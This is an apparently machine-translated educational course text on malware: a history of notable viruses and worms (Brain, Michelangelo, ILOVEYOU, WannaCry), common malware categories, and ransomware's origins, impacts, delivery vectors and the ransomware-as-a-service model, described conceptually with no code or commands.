Frederick Cohen, a graduate student at the University of Southern California, provides a glimpse of the digital future by demonstrating a computer virus during a security seminar at Lehigh University in Pennsylvania.

Cohen inserted his validation code into a Unix command and, five minutes after running it on a mainframe, he took control of the system. In four other demonstrations, the code managed to take control in an average of half an hour, bypassing all security mechanisms in effect at the time. It was Cohen's academic advisor, Len Adleman (the A in RSA encryption), who compared the self-replicating program to a virus, thus coining the term.

{% hint style="success" %}
It defines a "virus" as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself."
{% endhint %}

### 1986 - Brain

BBRAIN is considered the first PC virus (IBM Personal Computer) and was the cause of the first PC virus outbreak. Written by two brothers from Lahore, Pakistan Amjat Farooq Alvi and Basit Farooq Alvi, Brain hit the startup industries, spread widely across the world, and ushered in the modern era of viruses in computing. The perpetrators deny, and continue to deny, any malicious intent, claiming that they only targeted people who had themselves violated the brothers' copyrights in their proprietary medical software.

Brain would move the boot sector and mark it as bad, replacing the original boot sector with his own code. It spread itself when a new floppy disk was inserted into an infected machine and displayed a message that even contained the contact details of the authors:

![](/files/Lb5KAZOSsEuxOrlB8SXs)

The full message was:

> Welcome to the Dungeon © 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE:430791,443248,280530. Beware of this VIRUS…. Contact us for vaccination…………!!

And in French:

> Welcome to the Dungeon © 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE:430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination............!!

The message indicates the names of the authors, the address and the telephone number to contact them.

### 1992 - Michelangelo

On March 6, 1992, a virus from before the Internet era caused what was arguably the first public malware scare in history.

Michelangelo is classified as a boot sector virus, a type of virus that infects the boot sectors of storage devices, usually the boot sector of a floppy disk or the MBR (Master Boot Record) of a hard drive .

{% hint style="info" %}
**Master Boot Record**:

The Master Boot Record (MBR) is the first sector of a hard drive (and previously floppy disks), which contains information to identify the location and status of an operating system in order to to boot (load) it into the computer's main memory or random access memory (RAM). The Master Boot Record is sometimes called a "partition sector" or "master partition table" because it includes a table that locates each partition in which the hard drive was formatted.

Definition: WHATIS.Techtarget
{% endhint %}

Boot sector viruses are primarily spread through physical media such as floppy disks or USB sticks. They typically infect computers that boot using disks containing the malware, activating each time the storage device is loaded.

![](/files/jzAkb9l8iCSgaxfKupCQ)

In Michelangelo's case, once the virus infects a computer, it remains inactive until a specific date, March 6 of each year, to be exact. On March 6, any computer infected with Michelangelo had critical data on its startup disk overwritten, damaging the disk and rendering it unusable and the data almost unrecoverable.

There is no reference to the artist in the virus, and it is doubtful whether the developer(s) of the virus intended to establish a link between the virus and the artist who was born on March 6, 1475. The name was chosen by researchers who noticed the coincidence of the activation date. The actual significance of this date for the author is unknown. Michelangelo is a variant of the Stoned virus, already endemic in 1987.

Michelangelo's authorship has never been discovered. Given the times and lack of financial demands, Virus was likely written for the author's pleasure rather than possible financial gain.

At its peak, the Michelangelo virus gained notoriety for its supposed large-scale impact. Antivirus pioneer John McAfee estimated that the malware could have infected up to 5 million computers, which was a considerable number in the early 1990s. Major media outlets of the time picked up the story and made it a major news story - a devastating security incident that could have wreaked havoc on computers around the world. Needless to say, the news caught public attention at a time when malware awareness was still low.

On March 6, 1992, Michelangelo's impact was different than expected. Only a few thousand computers were found to have been infected by the virus, which was far from the highest estimates. In fact, research after the alert found that other virus variants were being discovered far more frequently than Michelangelo.

## Years: 2000 to 2017

### 2000 - ILOVEYOU

ILOVEYOU, sometimes called LoveLetter or LoveBug, is a computer worm that attacked more than ten million Windows personal computers beginning on May 5, 2000.

Identifiable by its attachment "LOVE-LETTER-FOR-YOU" and its subject line "ILOVEYOU", ILOVEYOU was one of the first worms to attract media attention. It is also one of the first to reach a multibillion-dollar damage toll, making it one of the most dangerous viruses.

This program was written by two young Filipino computer programmers, Reonel Ramones and Onel de Guzman, students at the AMA Computer University in Makati, Philippines.

He said the worm was very easy to create, thanks to a Windows 95 bug that executed code in email attachments when the user clicked on them. Originally designed to work only in Manila, it removed this geographic restriction out of curiosity, allowing the worm to spread worldwide. De Guzman did not expect this global spread.

![The email that contains the “ILOVEYOU” malware](/files/2AsftlfuLUZmM6CNEYIr)

### 2003 - SQL Slammer Worm

The SQL slammer worm is a computer virus (technically, a computer worm) that caused a denial of service on some Internet hosts and significantly slowed general Internet traffic, starting at 05:30 UTC on January 25, 2003.

It spread quickly, infecting most of its 75,000 victims within 10 minutes. Although titled "SQL slammer worm", the program did not use the SQL language; it exploited two buffer overflow bugs in Microsoft's flagship SQL Server database product. Other names include W32.SQLExp.Worm, DDOS.SQLP1434.A, the Sapphire worm, SQL\_HEL, and W32 /SQLSlammer.

![The spread of SQL SLAMME malwareR](/files/GvkU8W5dw9dCksoS8EtF)

According to members of NSF, DARPA, Silicon Defense, Cisco Systems, AT\&T, NIST and ACAA, SQL SLAMMER's propagation strategy relies on random scans: it selects IP addresses at chance to infect them and eventually finds all the susceptible hosts.

Random scan worms initially spread exponentially, but rapidly infecting new hosts becomes less efficient because the worm spends more effort retrying addresses that are either already infected or immune.

### **2004 - Cabir Virus**

Exactly ten years ago, we discovered the first real virus written for smartphones of the time (Nokia N-Gage, for example). It was called Cabir and it opened up a whole new world for malware analysts, virus writers and ordinary users. Here are some facts about this decade-old malware:

* The malware was named Cabir due to its resemblance to the "Caribe" character string found in the virus body and in honor of Kaspersky Lab employee Elena Kabirova, who accidentally entered the anti-malware lab during the discussion about the name.
* Cabir spread among the most popular smartphones of 2004 - Nokia devices based on Symbian.
* The only infection channel was Bluetooth. It was very easy to become infected while commuting, at a restaurant, at a concert or sporting event. One of the largest Cabir infections was detected during the Athletics World Cup held in Helsinki.
* To protect a smartphone from Cabir, you had to deactivate Bluetooth or simply put it in “invisible” mode.
* Kaspersky Lab analysts deliberately searched for two Nokia smartphones to study malware in the wild - this type of device was considered expensive in 2004. Since then, Kaspersky Lab has systematically purchased all the most popular models of mobile devices in order to search for malware for a given platform.

![](/files/NfZJit3TTe6RWaKMOrA8)

### 2013 - Cryptolocker ransomware attack

The CryptoLocker ransomware attack was a cyberattack using CryptoLocker ransomware that occurred from September 5, 2013 to late May 2014.

{% hint style="success" %}
**Ransomware:**

Ransomware is a type of malware that prevents or limits users' access to their system, either by locking the system screen or locking users' files until a ransom is paid. More modern ransomware families, collectively known as cryptoransomware, encrypt certain types of files on infected systems and force users to pay the ransom through certain online payment methods to obtain a decryption key. Definition: TREND MICRO
{% endhint %}

{% hint style="info" %}
A complete chapter will be developed on ransomware.
{% endhint %}

The attack used a Trojan targeting computers running Microsoft Windows and is believed to have first appeared on the Internet on September 5, 2013.

{% hint style="success" %}
Tr**ojan horse:**

A Trojan horse is a type of malware, which should not be confused with viruses or other parasites. Trojan is software that appears legitimate, but contains malicious functionality. Its aim is to bring this malicious feature into the computer and install it without the user's knowledge.

**Definition**: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Cheval_de_Troie_\(informatique\))
{% endhint %}

It was spread through infected email attachments and an existing Gameover ZeuS botnet. When activated, the malware encrypts certain types of files stored on local drives and mounted network drives using RSA public key cryptography, with the private key only stored on the file's controlling servers. program.

![](/files/ZmgTQcpwzuuEPiMc8BYW)

### **2017 –** WannaCry Ransomware

The WannaCry ransomware attack is a global cyberattack carried out in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payment in crypto -Bitcoin currency.

EternalBlue was stolen and leaked by a group called The Shadow Brokers a month before the attack.

{% hint style="success" %}
**ETERNALBLUE:**

EternalBlue is both the name given to a series of Microsoft software vulnerabilities and to the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit – officially named MS17-010 by Microsoft – only affects Windows operating systems, anything that uses the Server Message Block version 1 (SMBv1) file sharing protocol is technically at risk of being the exploit. target of ransomware and other cyberattacks.

**Definition**: Wikipedia
{% endhint %}

{% hint style="info" %}
**Exploit or exploit code:**

An exploit or exploit code is, in the field of computer security, a program element allowing an individual or malicious software to exploit a computer security vulnerability in a computer system.
{% endhint %}

While Microsoft had previously released patches to close the exploit, much of WannaCry's spread came from organizations that had not applied those patches or were using old, end-of-life Windows systems.

These fixes were imperative to enterprise cybersecurity, but many were not implemented due to ignorance of their importance. Some cited the need for 24/7 operation, aversion to the risk of previously working applications breaking due to patch changes, lack of staff or time for install, or other reasons.

![](/files/YSOgr00bwG98eFkUoJK8)


# Malware - Categories

In this chapter, I will introduce you to the most common categories of malware. This list is obviously exhaustive.

## Category table

<table data-header-hidden><thead><tr><th></th><th width="331.3333333333333"></th><th></th></tr></thead><tbody><tr><td><strong>Types</strong></td><td>Functionality</td><td><strong>Exemple Réel</strong></td></tr><tr><td>Ransomware or Ransomware</td><td>Blocks the victim's access to the data until the ransom is paid.</td><td><a href="https://www.trendmicro.com/fr_fr/what-is/ransomware/ryuk-ransomware.html"><strong>RYUK</strong></a></td></tr><tr><td>Fileless Malware</td><td>Modifies native operating system files.</td><td><a href="https://www.pcrisk.fr/guides-de-suppression/9232-astaroth-trojan"><strong>Astaroth</strong></a></td></tr><tr><td><a href="#spyware"><strong>Spyware</strong></a></td><td>Collects information about user activity without their knowledge.</td><td><a href="https://www.kaspersky.fr/resource-center/threats/darkhotel-malware-virus-threat-definition"><strong>DarkHotel</strong></a></td></tr><tr><td><a href="#worms"><strong>Worms</strong></a></td><td>Automatically replicates to spread the infection to a network.</td><td><a href="https://fr.wikipedia.org/wiki/Stuxnet#:~:text=Stuxnet%20est%20un%20ver%20informatique,d&#x27;enrichissement%20d&#x27;uranium."><strong>Stuxnet</strong></a></td></tr><tr><td><a href="#bots"><strong>Bots</strong></a></td><td>Launches a wide range of attacks</td><td><a href="https://www.zdnet.fr/actualites/le-nouveau-malware-d-echobot-est-un-concentre-de-vulnerabilites-39886143.htm"><strong>Echobot</strong></a></td></tr><tr><td><a href="#mobile-malware"><strong>Mobile Malware</strong></a></td><td>Infects mobile devices</td><td><a href="https://www.phonandroid.com/android-google-decouvre-malware-triada-preinstalle-smartphones.html"><strong>Triada</strong></a></td></tr></tbody></table>

## Ransomware

Ransomware has made headlines throughout 2021 and continues to make news in 2022.

You may have heard about attacks on large companies, organizations, or government agencies, or perhaps you've been the victim of a ransomware attack on your own device. It's a big problem and a scary prospect to have all your files and data held hostage until you pay up. If you want to learn more about this threat, read on to learn about the different forms of ransomware, how you get them, where they come from, who they target, and finally, what you can do to protect yourself from them.

A chapter is dedicated to Ransomware attacks in order to better explain it and protect yourself as much as possible.

## Fileless Malware

Fileless Malware is a type of malware that uses legitimate programs to infect a computer. They do not rely on files and leave no fingerprints, making them difficult to detect and remove.

Modern adversaries know the strategies organizations use to try to block their attacks, and they are designing increasingly sophisticated and targeted malware to evade defenses. It's a race against time, because the most effective hacking techniques are usually the newest.

The notion of malicious code residing only in memory certainly existed before the 21st century. Yet it wasn't until the prolific "Code Red" worm left its mark on the Internet in 2001 that the term "fileless malware" entered common parlance.

The first public reference I could find was in the summer of 2001, when Kaspersky Labs posted an announcement quoting none other than Eugene Kaspersky:

> "We predict that in the very near future, fileless worms like Code Red will become one of the most widespread forms of malware, and the ineffectiveness of antivirus in the face of such a threat only invites danger ."

Code Red exploited a vulnerability in Microsoft IIS web servers, remaining only in the memory of the infected host.

A year and a half later, another worm - SQL Slammer - spread like wildfire by exploiting a vulnerability in Microsoft SQL servers.

#### Functioning

Fileless malware attacks use existing vulnerabilities to infect a system. The attacker takes advantage of vulnerable software already installed on a computer to infiltrate, take control and carry out his attack. Unlike traditional malware, fileless malware does not need to install or download malware to infect the victim's machine.

Instead, the malware uses a system's own files and services to allow an attacker to access a device. Once inside the system, the attacker can access native operating systems such as Windows PowerShell and Windows Management Instrumentation (WMI) to carry out their malicious activity. Because many security technologies rely on these utilities, malicious activity can easily go unnoticed because analysts assume most actions are legitimate.

Fileless malware only exists in a computer's random access memory (RAM), meaning nothing is ever written directly to the hard drive. This makes them harder to detect because there are no stored files for defensive security software to scan. Additionally, security teams have little physical evidence to investigate after identifying a breach. However, because fileless malware runs in the computer's RAM and is never permanently saved to the hard drive, attackers have a smaller window of opportunity to execute the attack. When a system is rebooted, an attack using fileless malware must also be restarted.

#### Process

![](/files/WGmERSNtfMThJqlbrH1Y)

## **Spyware**

Spyware comes from the 2 English words: Spy (to spy) and Malware and it is therefore malicious spyware.

Spyware is maliciously behaved software that aims to collect information about a person or organization and send it to another entity in a way that harms the user, such as violating their privacy or endangering the security of your device. This behavior can be present in both malware and legitimate software. Websites can engage in spying behaviors like web tracking. Hardware devices may also be affected.

{% hint style="info" %}
And while the term "spyware" is usually reserved for malware, it's worth noting that not all software that tracks your web activity does so for the wrong reasons. Some online tracking software is used to remember your login information or to personalize your visit to the site.
{% endhint %}

#### Types de Spyware

![The 4 Common Types of Spyware](/files/vmuNn5e3VO5G4po8TAGm)

There are four common types of spyware. Their function ranges from tracking your browser activity so marketers can target your interests, for example, to monitoring your keystrokes and almost everything you do on your device. Here are some of the unique tactics that each type of spyware uses to track you:

* Adware tracks your browser history and downloads in an attempt to predict products or services of interest to you. They are used for marketing purposes.
* Trojans or Trojans are a type of malware disguised as legitimate software. Much like the Trojan horse of Greek mythology, a Trojan horse tricks you into letting it in (or, more precisely, installing it on your device), by acting like a software update or file. It then damages, disrupts or steals your data.
* Internet Tracking is a common practice used to track your web activities, such as browsing history and downloads, primarily for marketing purposes.
* System monitors are a type of spyware that can capture just about everything you do on your computer. They can record all your keystrokes, emails, chat room dialogues, websites visited and programs run. System monitors are often disguised as freeware.

## Worms

A computer worm, in English called WORM, is a self-contained malicious computer program that replicates itself in order to spread to other computers.

The worm often uses a computer network to spread, relying on security failures in the target computer to gain access. It will use this machine as a host to scan and infect other computers. When these new computers invaded by the worm are controlled, it will continue to scan and infect other computers using those computers as hosts, and this behavior will continue.

Computer worms use recursive methods to copy themselves without a host program and distribute themselves according to the law of exponential growth, thereby controlling and infecting more and more computers in a short time. Worms almost always cause at least some network damage, if only by consuming bandwidth, while viruses almost always corrupt or modify the files on a targeted computer.

<figure><img src="/files/QNfhqGBpOV6J4cfoNNwb" alt=""><figcaption><p>Worms can spread exponentially and infect every computer on the network.</p></figcaption></figure>

#### Method of propagation

* **Phishing:** Scam emails that appear genuine may contain worms in corrupted attachments. These emails may also invite users to click on malicious links or visit websites designed to infect users with worms.
* **Spear-Phishing:** Targeted phishing attempts can carry dangerous malware like cryptocurrencies like ransomware.
* **Networks**: Worms can self-replicate across networks via shared access.
* **Security Vulnerabilities**: Certain variants of worms can infiltrate a system by exploiting software vulnerabilities.
* **File Sharing:** P2P file networks can carry malware like worms.
* **Instant Messaging (IM):** All types of malware, including worms, can be spread through text messages and instant messaging platforms such as Internet Relay Chat ( IRC).
* **External devices:** Worms can infect USB drives and external hard drives.

#### Goals

Once a computer worm has penetrated your computer's defenses, it can perform several malicious actions:

* Dropping other malware like spyware or ransomware.
* Consume bandwidth.
* Delete files.
* Overload networks.
* Steal data.
* Open a backdoor.
* Destroy hard drive space.

#### Virus VS Worm

Popular thinking tends to believe that a virus and a worm are a single malware entity.

Certainly the behavior of the two is similar and their objectives too, but an essential difference exists: viruses depend on human action to be activated and need a host system to replicate. In other words, a virus can only harm your system if you run it.

For example, a virus on a USB stick connected to your computer will not harm your system if you don't activate it. And as mentioned above, a worm does not need a host system or user action to spread.

## **Bots**

A “bot” (short for “robot”) is software that performs automated, repetitive, predefined tasks. Bots typically imitate or replace the behavior of human users.

Since they are automated, they operate much faster than human users. They perform useful functions, such as customer service or search engine indexing, but they can also come in the form of malware - used to take complete control of a computer.

#### Difference Between Good and Bad Bot

Computer bots and Internet bots are essentially digital tools and, like any tool, they can be used for good or bad purposes.

Good bots perform useful tasks, but bad bots - also known as malicious bots - carry risks and can be used to hack, spam, spy, disrupt and compromise websites of all sizes. It is estimated that today, up to half of all internet traffic consists of computer bots performing certain tasks, such as automating customer service, simulating human communication on social networks, business help with online content research and search engine optimization assistance.

{% hint style="danger" %}
**According to "Bad Bot Report" relayed by CPOMagazine in their article: Bad Bot Traffic Report, more than 40% of internet usage comes from Bots, therefore 27% from bad Bots.**
{% endhint %}

Organizations or individuals use bots to replace repetitive tasks that a human would otherwise have to perform. The tasks performed by bots are generally simple and completed at a much faster pace than human activity.

Not all tasks performed by bots are benign – bots are sometimes used for criminal activities such as data theft, scams, or DDoS attacks.

#### Examples

While malicious bots create problems and challenges for organizations, dangers for consumers include their potential to carry out data and identity theft, keylogging of sensitive information such as passwords, bank details and addresses, and phishing.

Malicious bots can easily go unnoticed. They hide easily on a computer and often have similar or even identical file names and processes to regular system files or processes.

Here are some examples of malicious bots:

* **Spambots**&#x20;

Spambots can harvest email addresses from contact pages or guestbooks. They may also post promotional content in forums or comment sections in order to attract traffic to specific websites.

* **Malicious Chatterbots**

Dating websites and apps are havens for malicious chatbots. These bots pretend to be a person, imitating human interaction, and often trick people into not realizing they are chatting with harmful programs whose goal is to obtain personal information, including credit card numbers, of unsuspecting victims.

* **File sharing bots**

These bots take the user's query term (e.g. a popular movie or an artist's album) and respond to the query by indicating that they have the file to download and providing a link. The user clicks the link, downloads and opens the file, and unknowingly infects their computer.

* **Credential stuffing**

These are bots that "stuff" known usernames and passwords (usually from data breaches) into online login pages in order to gain unauthorized access to user accounts.

* **DoS or DDoS bots**

This is excessive bot traffic used intentionally to overwhelm a server's resources and prevent a service from functioning.

{% hint style="success" %}
**DoS & DDoS attack:**

A denial of service attack (DoS attack) is a computer attack aimed at making a service unavailable and preventing legitimate users of a service from using it.

Currently the vast majority of these attacks are carried out from several sources, we then speak of a distributed denial of service attack (DDoS attack for Distributed Denial of Service attack).

**Definition**: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Attaque_par_d%C3%A9ni_de_service)
{% endhint %}

## **Mobile Malware**

Mobile malware is malware specifically designed to target mobile devices, such as smartphones and tablets, with the aim of accessing private data.

Although mobile malware is not currently as prevalent as malware that attacks traditional desktops, it is a growing threat as many companies now allow employees access to corporate networks using their personal devices, which can bring unknown threats into the environment.

#### Types of Malware on Mobile

Cybercriminals use various tactics to infect mobile devices. If you're looking to improve your protection against mobile malware, it's important to understand the different types of mobile malware threats. Here are some of the most common types:

* Remote Access Tools (RATs) provide extensive access to data from infected victim devices and are often used for intelligence gathering. RATs can typically access information such as installed applications, call history, address books, Internet browsing history, and SMS data. RATs can also be used to send text messages, activate device cameras, and record GPS data.
* Banking Trojans are often disguised as legitimate applications and seek to compromise users who conduct banking transactions - including money transfers and bill payments - from their mobile devices. This type of Trojan aims to steal login data and financial passwords.
* Ransomware is a type of malware used to lock a user's access to their device and demand payment of a "ransom", usually in untraceable bitcoins. Once the victim pays the ransom, they are provided with passcodes to unlock their mobile device.
* Cryptomining Malware allows attackers to secretly run calculations on a victim's device - allowing them to generate cryptocurrencies. Cryptomining is often carried out through Trojan code hidden in legitimate-looking applications.
* Click-through fraud is a type of malware that allows an attacker to hijack a device to generate revenue through fake click-throughs.

#### Distribution

There are several ways that attackers distribute their malicious code, but the most commonly used are:

* **Mobile Phishing and Identity Theft:**

Phishing (see PHISHING in Capsule 1) is the practice of tricking someone into providing valuable personal information or account data, often through identity theft. .

Identity theft involves disguising an electronic communication or website as an entity the victim trusts. While identity theft and phishing often go hand in hand, identity theft can be used for nefarious purposes other than phishing for account information. For example, a spoofed email may attempt to convince the recipient to click on a malicious link.

While phishing has traditionally focused on acquiring credentials through email, phishing through SMS messages (smshishing) and messaging apps has become much more prevalent. In fact, 57% of organizations have experienced a mobile phishing attack. This shouldn't be too surprising when you consider the fact that people are 18 times more likely to click on a suspicious link on a mobile device than on a desktop computer.

One of the most common methods to trick victims into installing malware is to send them, via SMS, links to Android Package (APK) files hosted on websites controlled by attackers. For example, victims may be asked to click on an SMS link to a spoofed banking site, designed to appear trustworthy and convince the victim to "update their banking app." The update then installs the malicious code, allowing the attacker to gain access and collect credentials.


# Malware - Ransomware

This part will define ransomware, explain its origin as well as its evolution over the years, and give instructions on how to protect yourself and detect an attack.

## Definition

Ransomware, also called ransomware or ransomware, is a type of malware that prevents users from accessing their system or personal files and demands payment of a ransom in order to regain access.

While some people might think "a virus has locked my computer", ransomware is generally classified in a different category of malware than viruses.

The first ransomware variants were developed in the late 1980s, and payment had to be sent by postal mail. Today, ransomware perpetrators order payment to be sent by cryptocurrency or credit card, and attackers target individuals, businesses, and organizations of all kinds. Some ransomware authors sell the service to other cybercriminals, which is known as Ransomware-as-a-Service or RaaS.

## History

### The starting point

The first known example of ransomware is the AIDS Trojan software, also known as Aids Info Disk or PC Cyborg Trojan, which was created in 1989 by a group of hackers called "The AIDS Information Team". This malware spread via a floppy disk and once installed on the victim's computer, it displayed a message asking the user to pay a ransom of $189 to unlock the computer.

The purpose of the AIDS Trojan was to raise money for HIV/AIDS research according to one of its authors Dr. Joseph Popp, but the software was widely criticized for using dishonest methods to collect money. Although the AIDS Trojan was the first known example of ransomware, it did not have a significant impact on the world of cybersecurity at the time and was not really considered true malware.

<figure><img src="/files/RltSPS6sVGTqDdzCv5pO" alt=""><figcaption><p>Message after AIDS activation</p></figcaption></figure>

The AIDS Trojan was malware that spread via an infected floppy disk. Once installed on the victim's computer, it modified the AUTOEXEC.BAT file, which prevented the computer from booting properly. When the user restarted their computer, they would see a message asking them to pay a ransom of $189 to unlock their computer.

{% hint style="info" %}
**AUTOEXEC.BAT:**

AUTOEXEC.BAT is the name of a system file originally encountered in the MS-DOS operating system. This is a batch file of type .bat (command file in text format) located at the root of the device on which the computer starts. The name of the file comes from the concatenation of the words automatic and execution, thus describing its function which is to automatically execute commands upon system startup. The word AUTOEXEC was also created in order to respect the naming rule of the FAT file system which imposes an 8.3 format (i.e. 8 characters, a period, 3 characters).

Definition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Autoexec.bat)
{% endhint %}

Since then, more sophisticated malware families have emerged, such as GpCode in 2004, which was spread via malspam campaigns and whose victims were asked to use gift cards like Ukash to pay the ransom. This malware encrypted files like current ransomware, but it contained cryptographic flaws that made the recovery process rather easy.

{% hint style="success" %}
**MalSpam**:\
Malicious spam (malspam) is unsolicited email that seeks to deliver a malicious payload, either through a Microsoft Office attachment or by tricking the user into clicking a link in the email.
{% endhint %}

Around 2011, a new ransomware threat appeared: Reveton (police ransomware). This malware did not encrypt files but locked victims' screens, displaying a threatening police warning and asking users to pay a fine with prepaid gift cards like Paysafecard and MoneyPak. The warning was localized in different languages ​​and used relevant police logos, making the situation more realistic for victims.

<figure><img src="/files/GtvjWl7mGUBy0vr5U7JH" alt=""><figcaption><p>Ransomware message pretending to be the Belgian police</p></figcaption></figure>

### Bitcoin et Ransomware

Cybercrime - a broad category of malicious activity that includes all types of cybercriminal attacks, including malware, banking Trojans, ransomware,... - has seized the monetization opportunity created by bitcoin. This resulted in a significant proliferation of ransomware starting in 2012.

{% hint style="info" %}
**BITCOIN:**

Bitcoin is a peer-to-peer technology operating without a central authority. Transaction management and bitcoin creation is handled collectively by the network. Bitcoin is free and open. Its design is public, no one owns or controls Bitcoin and anyone can join. Thanks to several of its unique properties, Bitcoin makes promising uses possible that could not be covered by previous payment systems.

\
Definition: [**BITCOIN.ORG**](https://bitcoin.org/fr/)
{% endhint %}

However, this ransomware business model remains imperfect because while bitcoin payments are easy transactions for cybercriminals to use, they are not always as easy for their non-tech-savvy targets to navigate. To guarantee payment, some criminals have gone so far as to open call centers to provide technical support and help victims sign up for Bitcoin – but this takes time and costs money.

When Bitcoin began to gain popularity, ransomware developers realized that this was the method of monetary extraction they were looking for. Bitcoin exchanges have provided adversaries with a means to receive instant payments while maintaining anonymity, all transacted outside the strict confines of traditional financial institutions.

Here is a non-exhaustive list of known ransomware and how they work:

1. [**Cryptolocker** ](https://www.varonis.com/fr/blog/cryptolocker-tout-ce-que-vous-devez-savoir)(2013): This ransomware encrypted the user's files and demanded a ransom to decrypt them. It was usually spread via spam emails containing infected attachments.
2. [**WannaCry**](https://www.kaspersky.fr/resource-center/threats/ransomware-wannacry)(2017): This ransomware was one of the largest in history in terms of scope and damage caused. It spread rapidly globally by exploiting a security vulnerability in Windows systems. It has caused significant disruption to hospitals, businesses and other organizations.
3. [**NotPetya** ](https://fr.wikipedia.org/wiki/Cyberattaque_NotPetya)(2017): This ransomware spread mainly in Ukraine by posing as an update to the accounting software popularized in the country. It quickly spread its infection to other countries, causing significant disruption to businesses and organizations.
4. LockerGoga (2019): This ransomware primarily targeted businesses and organizations, causing significant disruption to their operations. It has been used in "ransomware" attacks aimed at encrypting user files and demanding a ransom to decrypt them.
5. [**Ryuk**](https://www.trendmicro.com/fr_fr/what-is/ransomware/ryuk-ransomware.html)(2019): This ransomware mainly targets businesses and organizations and demands a large ransom to decrypt files. It has been involved in numerous high-profile software ransom attacks.

## Consequences of an attack

#### Income

A ransomware attack can seriously impact an organization's ability to operate. Even if the organization is well prepared and has working backups, restoring affected systems can take hours. Worse yet, organizations that were not as well prepared, or whose backups may have been compromised during the attack, may take days or weeks to return to full operational capacity, meaning their revenue will decline or stop completely while they recover.

#### Reputationv

A data breach or ransomware attack can damage a company's reputation. Some customers may view a successful attack as a sign of weak security practices, or be so severely affected by a service outage that they choose to change companies.

#### Financier

Ransomware comes with unexpected costs and is expensive. In addition to the loss of revenue an organization may incur, there are other costs that may be obvious and others that may not. The most obvious costs are: the cost of paying the ransom (if paid); the cost of remediating the incident, including new hardware, software and incident response services; insurance deductibles; attorney fees and litigation; and public relations. Other less obvious costs may include: increased insurance premiums, devaluation of reputation/family name and loss of intellectual property.

#### Data

In a ransomware attack, a malicious actor encrypts many files, rendering them and the systems that depend on them unusable. If a ransom is not paid, these encrypted files are often permanently locked, forcing the organization to regenerate the information, if it can. However, even if a ransom is paid, there is no guarantee that a threat actor will act benevolently and provide a decryption key. Additionally, even if a key is provided, it is still possible that the ransomware attack caused significant destructive damage, which may require rebuilding affected systems anyway. Additionally, if the threat actor stole a trade secret, proprietary information, or personally identifiable information (PII), the loss of that data could give rise to legal action or result in loss of competitive advantage .

## Attack vectors

#### By email

Phishing attacks are one of the most common delivery systems for ransomware. In these attacks, hackers successfully convince a person to click on a link or open an attachment who then downloads the ransomware to their system. This attack vector often takes the form of social engineering in which cybercriminals pose as someone the recipient trusts and trick them into granting administrative access to company systems.

There are different techniques:

* Phishing links embedded in the body of the message

<figure><img src="/files/dq83x6uA8YzkLjWrT7WQ" alt=""><figcaption><p>A fraudulent link redirects the user to the FAKE site</p></figcaption></figure>

* Malicious attachments

<figure><img src="/files/WUDAajgIgeniqLOGsVtf" alt=""><figcaption><p>The email contains a malicious attachment</p></figcaption></figure>

#### Pages Web&#x20;

Malicious ransomware code can also be found in web scripts hidden on seemingly legitimate or compromised sites. This is a perfect attack vector for cybercriminals because victims believe they are visiting a trusted site. When a person visits this site, the code is automatically downloaded, and once executed, it can infect the user's system and move laterally through the organization, encrypting files and data.

#### Pop-ups&#x20;

Advertisements and pop-ups are another common vector for ransomware attacks on the Internet. They may appear genuine, but like phishing schemes, they can trick people into clicking on them by pretending to be a trusted brand. At that point, they either direct the user to a new open window containing malicious links or automatically download ransomware or other forms of malware onto the user's computer.

<figure><img src="/files/LRC1R5YdRntpuIxr5AwE" alt=""><figcaption><p>A pop-up that asks to do a Chrome update, but which ultimately downloads the ransomware</p></figcaption></figure>

#### Instant messages

As users become more aware of email phishing, hackers have turned to instant messaging platforms such as WhatsApp, Slack, Snapchat, Facebook Messenger and Microsoft Teams to carry out smishing campaigns. These threats work in much the same way as email attacks, where the ransomware is launched when a user clicks on a link or attachment from a sender posing as a reputable company.

Many organizations have blocked these platforms in the past, but with the rise of remote working habits, instant messaging has become an essential collaboration tool for businesses around the world, making these attacks difficult to avoid.

<figure><img src="/files/yWvbMxkggjrSXjPoPbTw" alt=""><figcaption></figcaption></figure>

Text Messages

Text messages are an extremely popular vector for ransomware. Spam, impersonation, and phishing messages are the main culprits, with attackers often using ransomware-as-a-service or malware-for-hire to easily and cheaply execute ransomware attacks. When a user clicks on a link, the ransomware is downloaded to their device and can spread to everyone in their contact list, including coworkers.

<figure><img src="/files/y2e99MYgk7enR8Z99S2F" alt=""><figcaption></figcaption></figure>

## Ransomware as a Service (RaaS)

Ransomware as a Service (RaaS) is a business model between ransomware operators and affiliates in which affiliates pay to launch ransomware attacks developed by the operators. The ransomware service is a variation of the SaaS (Software as a Service) business model.

{% hint style="info" %}
SaaS ou Software as a Service:

Software as a service (SaaS), or software as a service, is a commercial exploitation model of software in which it is installed on remote servers rather than on the user's machine. Customers do not pay a user license for a version, but freely use the online service or, more generally, pay a subscription.

Definition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Software_as_a_service)
{% endhint %}

RaaS kits allow affiliates who don't have the skills or time to develop their own ransomware variant to get up and running quickly and affordably. They are easy to find on the dark web, where they are advertised in the same way as goods on the legal web.

A RaaS kit can include 24/7 support, bundles, user reviews, forums, and other features similar to those offered by legitimate SaaS providers. RaaS kits range in price from $40 per month to several thousand dollars - insignificant amounts, considering that the average ransom demand in 2021 was $6 million. A threat actor does not need every attack to be a success to enrich themselves.

There are four common RaaS revenue models:

* Monthly subscription for a fixed amount
* Affiliate programs, which are the same as the monthly fee model but where a percentage of the profits (usually 20-30%) go to the ransomware developer
* Single license fee without profit sharing
* Pure and simple profit sharing

The most sophisticated RaaS operators offer portals that allow their subscribers to view infection status, payment totals, total encrypted files, and other information about their targets. An affiliate can simply log into the RaaS portal, create an account, pay with bitcoins, enter details about the type of malware they want to create, and click the submit button. Affiliates may have access to the same support, communities, documentation, feature updates, and other benefits as subscribers to legitimate SaaS products.

